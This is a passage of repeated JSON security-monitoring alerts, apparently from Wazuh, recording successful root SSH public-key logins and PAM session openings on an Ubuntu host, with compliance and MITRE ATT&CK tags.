(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 